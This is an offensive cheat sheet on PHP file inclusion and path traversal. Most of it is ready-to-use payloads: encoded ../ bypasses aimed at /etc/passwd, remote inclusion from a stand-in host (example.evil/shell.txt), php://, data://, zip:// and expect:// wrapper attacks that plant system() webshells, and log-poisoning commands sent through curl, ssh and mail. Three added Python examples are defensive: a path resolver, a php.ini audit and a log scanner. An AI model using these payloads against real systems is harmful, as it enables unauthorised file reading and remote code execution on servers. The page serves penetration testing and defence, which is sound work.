# File Inclusion and Path Traversal

## At a Glance

### File Inclusion

File inclusion is the mechanism by which applications and scripts include local or remote files at run time. The vulnerability occurs when an application builds the path to executable code from an attacker-controlled variable, giving the attacker control over which file is executed.

There are two types: Local File Inclusion (LFI), where the application includes files on the current server, and Remote File Inclusion (RFI), where the application downloads and executes files from a remote server.[^1]

### Path Traversal

A path (or directory) traversal attack exploits weak validation or sanitization of user-supplied data, allowing the attacker to read files or directories outside the context of the current application.

The use of these techniques may lead to information disclosure, cross-site scripting (XSS) and remote code execution (RCE).[^2]
## LFI

### Basic LFI

#### Absolute Path Traversal

```
http://example.com/index.php?page=/etc/passwd
```

#### Relative Path Traversal

```
http://example.com/index.php?page=../../../etc/passwd
```

#### Null Byte

Sometimes applications append extra characters, such as a file extension, to the input variable. A null byte makes the application ignore the characters that follow it.

```
http://example.com/index.php?page=../../../etc/passwd%00
```

Note: PHP fixed this issue in version 5.3.4 (https://bugs.php.net/bug.php?id=39863).

#### Dot Truncation

In PHP, filenames longer than 4096 bytes are truncated, and the characters after that limit are ignored.

```
http://example.com/index.php?page=../../../etc/passwd................[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../../etc/passwd
```

Note: in PHP, the following paths are equivalent:

```
/etc/passwd
= /etc//passwd
= /etc/./passwd
= /etc/passwd/
```
### Encoding

Manipulating variables that reference files with "dot-dot-slash" (`../`) sequences and their variations, or using absolute file paths, may allow bypassing poorly implemented input filtering.[^3]

| Character | URL | Double URL | UTF-8 Unicode | 16-bit Unicode |
|---|---|---|---|---|
| `.` | `%2e` | `%252e` | `%c0%2e` `%e0%40%ae` `%c0%ae` | `%u002e` |
| `/` | `%2f` | `%252f` | `%c0%2f` `%e0%80%af` `%c0%af` | `%u2215` |
| `\` | `%2c` | `%252c` | `%c0%5c` `%c0%80%5c` | `%u2216` |
#### Encoded ../

```
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
```

#### Encoded ..\

```
%2e%2e%2c
%252e%252e%252c
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2216
```
#### Double URL Encoding

```
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
```

#### UTF-8 Encoding

```
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```

### Bypass Filtering

```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```
#### Bypass ../ removal

```
..././
...\.\
```

#### Bypass ../ replaced with ;

```
..;/
http://example.com/page.jsp?include=..;/..;/sensitive.txt
```
### Windows UNC Share[^4]

Windows UNC shares can be injected to redirect access to other resources.

```
\\localhost\c$\windows\win.ini
```
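Every encoding and doubled-sequence trick in the LFI section above defeats the same kind of defence: a filter that searches the raw input for a literal `../` and strips it once. The Python example below is added here for illustration and is not code from the original page; it puts such a strip-once filter (`naive_filter`, `filter_then_decode`) next to a resolver (`resolve_page`) that canonicalises the final path and confines it to a base directory. `BASE_DIR`, `ALLOWED_EXT` and all function names are assumptions made for this example.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed for this example: the only directory the page handler may read from.
BASE_DIR = os.path.realpath("/var/www/app/pages")
ALLOWED_EXT = {".php", ".html"}


def naive_filter(page: str) -> str:
    """A typical broken mitigation: strip '../' once, then prepend the base directory.
    Returns the path the OS would actually open for that result."""
    cleaned = page.replace("../", "").replace("..\\", "")
    # os.path.join silently discards BASE_DIR when 'cleaned' is absolute.
    return os.path.realpath(os.path.join(BASE_DIR, cleaned))


def filter_then_decode(raw_page_param: str) -> str:
    """Order-of-operations bug behind double URL encoding: the filter runs on the
    still-encoded value and the second decode happens afterwards, so '%2e%2e%2f'
    never looks like '../' to the filter."""
    return os.path.realpath(unquote(naive_filter(raw_page_param)))


def resolve_page(page: str) -> Optional[str]:
    """Hardened resolution: reject, canonicalise, then confine to BASE_DIR.
    Returns the canonical path to include, or None when the request must be refused."""
    # 1. A null byte truncates the C string inside the runtime ('passwd%00.php'); refuse it.
    if "\x00" in page:
        return None
    # 2. Absolute paths and Windows-style '\\server\share' UNC paths are never legitimate here.
    if os.path.isabs(page) or page.startswith("\\"):
        return None
    # 3. Canonicalise: collapses '.', '..' and '//' and resolves symlinks, so every
    #    doubled or decoded variant ends up as the path it really denotes.
    candidate = os.path.realpath(os.path.join(BASE_DIR, page))
    # 4. Confine: the canonical path must lie inside BASE_DIR. commonpath avoids the
    #    startswith() trap where '/var/www/app/pages_old/x' would pass.
    try:
        if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
            return None
    except ValueError:  # mixed absolute/relative paths or different drives (Windows)
        return None
    # 5. Allow-list the extension instead of appending one after the fact.
    if os.path.splitext(candidate)[1] not in ALLOWED_EXT:
        return None
    return candidate


def handle_request(raw_page_param: str) -> Optional[str]:
    """Handler that URL-decodes the parameter a second time (the web server already
    decoded it once). The hardened check runs on the final string, so the extra
    decode no longer helps an attacker."""
    return resolve_page(unquote(raw_page_param))


if __name__ == "__main__":
    for p in ["about.php", "/etc/passwd", "../../../../etc/passwd",
              "....//....//....//....//etc/passwd", "about.php\x00.txt"]:
        print(repr(p), "->", resolve_page(p))
    print("naive, doubled sequence:", naive_filter("....//....//....//....//etc/passwd"))
    print("naive, filter then decode:", filter_then_decode("%2e%2e%2f" * 4 + "etc%2fpasswd"))
```

Running the script shows the naive filter stopping the plain `../../../../etc/passwd` form but letting `....//` and the double-encoded form reach `/etc/passwd`, while `resolve_page` refuses absolute paths, null bytes and anything that canonicalises outside `BASE_DIR`; the extension allow-list also makes the dot-truncation trick moot, because nothing is appended to the user's value.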
## RFI

Most filter-bypassing techniques for LFI can also be used for RFI.

### Basic RFI

```
http://example.com/index.php?page=http://example.evil/shell.txt
```

### Null Byte

```
http://example.com/index.php?page=http://example.evil/shell.txt%00
```

### Bypass http(s):// removal

```
hhttp://thttp://thttp://phttp://:http://http:///http:///
hhttps://thttps://thttps://phttps://shttps://:https:///https:///https://
```

### Bypass allow_url_include

On Windows, it is possible to bypass a disabled `allow_url_include` and `allow_url_fopen` by using SMB: simply include a script located in an open share.

```
http://example.com/index.php?page=\\10.0.0.1\share\shell.php
```
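From the defender's side, whether `allow_url_include`, `allow_url_fopen`, `open_basedir` and `disable_functions` are set decides how much of the RFI and wrapper material on this page applies to a given host. The Python script below is an added example, not code from the page or from PHP's own tooling: it reads a `php.ini` fragment and reports the permissive settings, with a weak and a hardened configuration side by side. Both ini fragments are constructed, the function names are this example's own, and the parser only sees the text it is given (per-directory or `.htaccess` overrides are out of its view). As the SMB note above shows, turning the URL wrappers off is not sufficient on Windows, so a missing `open_basedir` is reported as a finding in its own right.

```python
from typing import Dict, List

# Values PHP treats as "on" in ini files.
PHP_TRUE = {"1", "on", "true", "yes"}
# Functions the payloads on this page rely on to run commands.
EXEC_FUNCS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}


def parse_php_ini(text: str) -> Dict[str, str]:
    """Minimal php.ini reader: skips blank lines, ';' comments and [sections];
    a later key overrides an earlier one, as PHP does. Keys are lower-cased."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value: str) -> bool:
    return value.strip().lower() in PHP_TRUE


def audit(settings: Dict[str, str]) -> List[str]:
    """Report settings that make the LFI/RFI material on this page exploitable.
    Defaults follow PHP's own (allow_url_fopen On, allow_url_include Off)."""
    findings = []
    if is_on(settings.get("allow_url_include", "0")):
        findings.append("allow_url_include=On: include/require accept remote and data:// wrappers (RFI)")
    if is_on(settings.get("allow_url_fopen", "1")):
        findings.append("allow_url_fopen=On: file functions accept remote URLs")
    if not settings.get("open_basedir"):
        findings.append("open_basedir unset: a traversed path can reach /etc/passwd, /proc and log files")
    disabled = {f.strip() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(EXEC_FUNCS - disabled)
    if missing:
        findings.append("command-execution functions still enabled: " + ", ".join(missing))
    return findings


# Constructed ini fragments for the example (not taken from a real deployment).
WEAK_INI = """
[PHP]
; everything left at permissive values
allow_url_fopen = On
allow_url_include = On
expose_php = On
"""

HARDENED_INI = """
[PHP]
allow_url_fopen = Off
allow_url_include = Off
open_basedir = "/var/www/app:/tmp"
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(parse_php_ini(ini)) or ["no findings"])
```

The weak fragment produces four findings and the hardened one none; note that `open_basedir` does not stop `php://filter` or `data://` on their own, which is why the audit also insists on `allow_url_include=Off` and on the execution functions being disabled.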
## PHP Stream Wrappers

PHP provides many built-in wrappers for various protocols, to use with file functions such as `fopen`, `copy`, `file_exists` and `filesize`.[^5]

### php://filter

`php://filter` is a kind of meta-wrapper that allows filtering a stream before the content is read. The resulting data is the encoded version of the given file's source code.

Note: multiple filters can be specified on one path, chained using `|` or `/`.

#### string.rot13

```
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
```

#### convert.iconv / convert.base64-encode

```
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
```

#### zlib.deflate / convert.base64-encode

```
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
```

#### Base64 decode and gzip inflate

The resulting encoded string can be decoded and inflated by piping it into the following PHP one-liner:

```
echo [BASE64-STR] | php -r 'echo gzinflate(base64_decode(file_get_contents("php://stdin")));'
```
### zip://

`zip://` is a wrapper for zip compression streams. To leverage it, upload a zipped PHP script to the server (with the preferred extension) and have the server decompress it using `zip://<zipfile>#<file>`, where `<file>` is the decompressed file to include.

```
echo -n '<?php system($_GET['c']); ?>' > shell.php
zip shell.jpg shell.php
```

```
http://example.com/index.php?page=zip://shell.jpg%23shell.php
```
### data://

`data://` is a wrapper for the RFC 2397 `data:` scheme, which allows the inclusion of small data items as if they had been included externally.[^6]

PHP shell script:

```
echo -n '<?php system($_GET['c']); ?>' | base64
PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=
```

```
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=ls
```
### expect://

The `expect://` wrapper provides access to a process's stdin, stdout and stderr via a PTY.

```
http://example.com/index.php?page=expect://ls
```

### php://input

`php://input` is a read-only stream that allows reading raw data from the request body.

```
curl -X POST --data "<?php echo shell_exec('ls'); ?>" "http://example.com/index.php?page=php://input%00" -v
```
## The proc File System

The proc file system (procfs) contains a hierarchy of special files that represent the current state of the kernel. It acts as an interface to the kernel's internal data structures for applications and users. Because of its abstract properties, it is also referred to as a virtual file system. Files within this directory are listed as zero bytes in size, even though they can contain a large amount of data.[^7]

### Process Directories

The `/proc` directory contains one subdirectory for each process running on the system, named after the process ID (PID). Each of these directories contains files that store information about the respective process.[^8]

### /proc/self (fs/proc/self.c)

`/proc/self` represents the currently scheduled PID; in other words, it is a symbolic link to the currently running process's directory. It is a self-referencing entry maintained by the kernel.
### Useful /proc entries

- `/proc/version`: kernel version.
- `/proc/sched_debug`: scheduling information and running processes per CPU.
- `/proc/mounts`: mounted file systems.
- `/proc/net/arp`: ARP table.
- `/proc/net/route`: routing table.
- `/proc/net/tcp` and `/proc/net/udp`: active TCP or UDP connections.
- `/proc/net/fib_trie`: routing table trie.[^9]

### Useful /proc/[PID] entries

- `/proc/[PID]/cmdline`: process invocation command with parameters. It potentially exposes paths, usernames and passwords.
- `/proc/[PID]/environ`: environment variables. It potentially exposes paths, usernames and passwords.
- `/proc/[PID]/cwd`: the process's current working directory.
- `/proc/[PID]/fd/[#]`: file descriptors; one entry for each file the process has open.
## LFI2RCE - /proc

### /proc/self/environ

`/proc/self/environ` contains user input, which turns it into useful volatile storage. Apache stores an environment variable for the `HTTP_USER_AGENT` header, to be used by the self-contained modules.[^10]

```
curl "http://example.com/index.php?page=/proc/self/environ&c=id" -H "User-Agent: <?php system(\$_GET['c']); ?>"
```

### /proc/[PID]/fd/[FD][^3]

Upload a lot of shells, then include `http://example.com/index.php?page=/proc/$PID/fd/$FD`, brute-forcing the process ID (`$PID`) and the file descriptor ID (`$FD`).
## LFI2RCE - Log Poisoning

A log file contains a record of events from an application. A log poisoning attack consists of triggering one of these events with executable code as part of the logged data and then, through LFI, including and executing that code.

Note: it is recommended to first load the target log, not only to verify access but to identify what data is being stored. Administrators can modify the logged data according to their needs.

### Apache

By default, Apache maintains access and error logs. The error log commonly registers the `Referer` header, while the access log registers the `User-Agent`.[^11]

#### Access Log

Make a valid request with the code in the `User-Agent` header.

```
curl -H "User-Agent: <?php system(\$_GET['c']); ?>" "http://example.com" -v
```

#### Error Log

Make an invalid request (an invalid inclusion, for example) with the suitable `Referer` header.

```
curl -H "Referer: <?php system(\$_GET['c']); ?>" "http://example.com/invalid#req" -v
```

Note: the Apache logging API escapes strings going to the logs. Use single quotes (`'`) in the payload, since double quotes (`"`) are escaped.

#### LFI

```
http://example.com/index.php?page=/path/to/access.log&c=id
```
#### Common Apache Log Paths

Log files can also be set to custom locations, either globally or per domain if virtual hosting is enabled.

```
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/usr/local/apache/log/access_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/access_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
```

### SSH

SSH logs the username of each connection. Create an SSH connection with the suitable username.

```
ssh "<?php system('id'); ?>"@example.com
```

#### LFI

```
http://example.com/index.php?page=/path/to/sshd.log&c=id
```

#### Common SSH Log Paths

```
/var/log/auth.log
/var/log/sshd.log
```

### Email

Email an internal account with the script in the subject line.

```
mail -s "<?php system(\$_GET['c']); ?>" www-data@10.0.0.3 < /dev/null
```

#### LFI

```
http://example.com/index.php?page=/var/mail/www-data&c=id
```
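Every technique on this page, from the encoding table to the log-poisoning commands just above, leaves a trace in the web server's own access log: the traversal or wrapper string in the request line, or the PHP tag in the `User-Agent` or `Referer` field. The Python example below is added here and is not from the original page; it scans Apache combined-format lines for those indicators after undoing repeated percent-encoding and the overlong UTF-8 and `%u` forms listed in the encoding table. The log lines are constructed (their payloads mirror the ones on this page), and the regexes and finding labels are the example's own choices.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Apache "combined" log format (the format poisoned through User-Agent on this page).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Overlong UTF-8 and %u forms from the encoding table, mapped to the character they stand for.
# urllib's unquote would turn these into U+FFFD, so they are folded before decoding.
NONSTANDARD = {
    "%c0%2e": ".", "%e0%40%ae": ".", "%c0%ae": ".", "%u002e": ".", "%uff0e": ".",
    "%c0%2f": "/", "%e0%80%af": "/", "%c0%af": "/", "%u2215": "/",
    "%c0%5c": "\\", "%c0%80%5c": "\\", "%u2216": "\\",
}

TRAVERSAL_RE = re.compile(r"\.{2,};?[\\/]")            # ../  ..\  ....//  ..;/  ..././
WRAPPER_RE = re.compile(r"\b(?:php|data|zip|expect|phar|glob|compress\.zlib)://")
RFI_RE = re.compile(r"=(?:https?|ftps?)://|=\\\\")      # =http://evil  or  =\\server\share
SENSITIVE_RE = re.compile(r"/(?:etc/passwd|proc/self/environ|proc/\d+/fd/\d+|var/log/|var/mail/)")
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)


def normalise(uri: str, rounds: int = 3) -> str:
    """Lower-case, fold the non-standard encodings and percent-decode repeatedly
    (bounded, so a pathological request cannot keep the scanner busy)."""
    s = uri.lower()
    for _ in range(rounds):
        for enc, plain in NONSTANDARD.items():
            s = s.replace(enc, plain)
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def inspect_line(line: str) -> List[str]:
    """Return the indicators found in one log line (empty list when clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed log line"]
    uri = normalise(m["uri"])
    findings = []
    if TRAVERSAL_RE.search(uri):
        findings.append("path traversal sequence in request")
    if WRAPPER_RE.search(uri):
        findings.append("stream wrapper scheme in request")
    if RFI_RE.search(uri):
        findings.append("remote URL or UNC path in parameter (possible RFI)")
    if SENSITIVE_RE.search(uri):
        findings.append("sensitive file referenced in request")
    if "\x00" in uri:
        findings.append("null byte in request")
    for field in ("referer", "ua"):
        if PHP_TAG_RE.search(m[field]):
            findings.append(f"php tag in {field} header (log poisoning attempt)")
    return findings


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(index, findings) for every line that raised at least one indicator."""
    results = []
    for i, line in enumerate(lines):
        findings = inspect_line(line)
        if findings:
            results.append((i, findings))
    return results


# Constructed sample log lines (not real traffic); the payloads mirror the ones on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1024 "-" "curl/7.88"',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048 "-" "curl/7.88"',
    '10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?page=/proc/self/environ&c=id HTTP/1.1" 200 300 "-" "<?php system($_GET[c]); ?>"',
    '10.0.0.9 - - [10/Oct/2023:13:55:43 +0000] "GET /index.php?page=....//....//etc/passwd%00 HTTP/1.1" 404 200 "-" "curl/7.88"',
    '10.0.0.9 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 1024 "-" "curl/7.88"',
    '10.0.0.9 - - [10/Oct/2023:13:55:45 +0000] "GET /index.php?page=http://example.evil/shell.txt HTTP/1.1" 200 64 "-" "curl/7.88"',
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG):
        print(index, findings)
```

Only the first sample line comes back clean. The decode loop is what catches the double-encoded and overlong forms: a rule that matched the raw request line for `../` would miss both, and it would equally miss the `....//` doubling, which the `\.{2,}` pattern folds into one indicator. Because the scanner reads the same log file that an attacker would try to poison, a PHP tag in the `User-Agent` or `Referer` column is treated as its own finding.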
## Further Reading

- OWASP - Testing Directory Traversal File Include
- BSidesMCR 2018: It's A PHP Unserialization Vulnerability Jim, But Not As We Know It by Sam Thomas
- PayloadsAllTheThings Intruders

[^1]: Contributors to Wikimedia projects. "File Inclusion Vulnerability - Wikipedia." Wikipedia, the Free Encyclopedia, Wikimedia Foundation, Inc., 24 Nov. 2006, https://en.wikipedia.org/wiki/File_inclusion_vulnerability.
[^2]: "Path Traversal - OWASP." OWASP, https://wiki.owasp.org/index.php/Path_Traversal.
[^3]: swisskyrepo. "PayloadsAllTheThings / Directory Traversal." GitHub, https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal.
[^4]: "CWE-40: Path Traversal: '\UNC\share\name\' (Windows UNC Share) (4.1)." CWE - Common Weakness Enumeration, https://cwe.mitre.org/data/definitions/40.html.
[^5]: "PHP: Supported Protocols and Wrappers - Manual." PHP: Hypertext Preprocessor, https://www.php.net/manual/en/wrappers.php.
[^6]: "RFC 2397 - The 'Data' URL Scheme." IETF Tools, https://tools.ietf.org/html/rfc2397.
[^7]: "The /Proc Filesystem." The Linux Kernel Documentation, https://www.kernel.org/doc/html/latest/filesystems/proc.html.
[^8]: "Proc(5) - Linux Manual Page." Michael Kerrisk - Man7.Org, https://man7.org/linux/man-pages/man5/proc.5.html.
[^9]: Bernat, Vincent. "IPv4 Route Lookup on Linux." Vincent Bernat, https://vincent.bernat.ch/en/blog/2017-ipv4-route-lookup-linux.
[^10]: "LFI2RCE (Local File Inclusion to Remote Code Execution) Advanced Exploitation: /Proc Shortcuts." Ush.It - a Beautiful Place, https://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/.
[^11]: "Log Files - Apache HTTP Server Version 2.4." The Apache HTTP Server Project, https://httpd.apache.org/docs/2.4/logs.html.